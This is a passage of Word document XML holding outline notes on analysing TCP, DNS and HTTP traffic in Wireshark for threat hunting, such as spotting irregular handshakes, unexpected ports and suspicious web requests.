        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Transmission Control Protocol – handles delivery of packets including sequencing and errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5F91A" w14:textId="45540183" w:rsidR="00E72ADA" w:rsidRPr="0084205E" w:rsidRDefault="00E72ADA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ports closed is RST, ACK packets are in red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CAE9AA" w14:textId="23354890" w:rsidR="00E72ADA" w:rsidRPr="0084205E" w:rsidRDefault="00E72ADA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Due to sheer number of TCP packets captured by Wireshark requires assistance from RSA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetWitness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetworkMiner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to filter out and analyze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D7841" w14:textId="48F86724" w:rsidR="00E72ADA" w:rsidRPr="0084205E" w:rsidRDefault="00E72ADA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Necessary to Know TCP Handshake (SYN </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ACK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C999AA1" w14:textId="7565FAA8" w:rsidR="00E72ADA" w:rsidRPr="0084205E" w:rsidRDefault="00E72ADA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If out of order, or includes other packets such as RST, indicates suspicious activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E04B4" w14:textId="725AA496" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TCP Packet Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68FAD7" w14:textId="69CD942D" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Main thing to search for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA8507" w14:textId="4C232F41" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sequence number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD8BF6E" w14:textId="22187C12" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Edit &gt; preferences &gt; protocols &gt; TCP &gt; relative sequence numbers (uncheck boxes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826D741" w14:textId="74755E2F" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Acknowledgement number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13647EF9" w14:textId="55AB1FE4" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If 0, port is not open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3608C" w14:textId="270B15B2" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C06C2" w14:textId="7478A59D" w:rsidR="00DB5704" w:rsidRPr="0084205E" w:rsidRDefault="00DB5704" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Name Service P</w:t>
      </w:r>
      <w:r w:rsidR="006C7F77" w:rsidRPr="0084205E">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>otocol</w:t>
      </w:r>
      <w:r w:rsidR="006C7F77" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – resolves IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53765CE3" w14:textId="63CC7114" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AF923" w14:textId="0197F193" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Query-Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1B524B" w14:textId="581397CE" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS-Servers Only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3922E" w14:textId="185C1EEE" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B5A58" w14:textId="6D5E9515" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If any of these are out of place, consider suspicious and analyze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A40FC" w14:textId="515DB0E0" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS Traffic Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12575F6A" w14:textId="1ADA10DC" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Source – UDP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Port: #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC5860A" w14:textId="50C4B288" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If port is incorrect, consider packet suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501F355" w14:textId="5BA1E18A" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Queries List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5642B9" w14:textId="4FAA4044" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Essential to understand what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>is typical traffic in the network environment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> you are analyzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA010A6" w14:textId="080319CC" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Google searches normal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0156C3" w14:textId="7E32BD11" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Social Media Sites?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C4077" w14:textId="064BE431" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DNS Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DD2B1" w14:textId="29A48753" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Answers List as opposed to Queries List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E83D9E" w14:textId="7662D50D" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Transaction IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48945307" w14:textId="1B47FBC1" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="006C7F77" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTP Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391CB5E" w14:textId="7D94B663" w:rsidR="006C7F77" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Used to send GET and POST requests to a web server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> receive things such as webpages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25F1D8" w14:textId="0BD04067" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful in spotting SQLi, Web Shells, and other web-related attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4363CB" w14:textId="34C19D11" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTP Traffic Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B352C5" w14:textId="425EFDB9" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Does not use handshakes or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>prereqs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> before communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513889AF" w14:textId="6B5961B0" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Important information to gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F058217" w14:textId="390708C7" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE88EF6" w14:textId="56FD555B" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B26BB" w14:textId="4FC0775F" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Request URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B06642" w14:textId="221A4F9F" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743165FA" w14:textId="6307B23C" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D8DC6" w14:textId="666D5642" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B931778" w14:textId="665CA703" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Analyze with Protocol Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8007D1" w14:textId="4E4D23AA" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Statistics &gt; Protocol Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E2114" w14:textId="7F27091F" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful for threat hunting to identify discrepancies in packet captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795E299" w14:textId="2F735538" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Export HTTP Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769909E6" w14:textId="7F517329" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allow organize all URIs in capture</w:t>
      </w:r>
    </w:p>
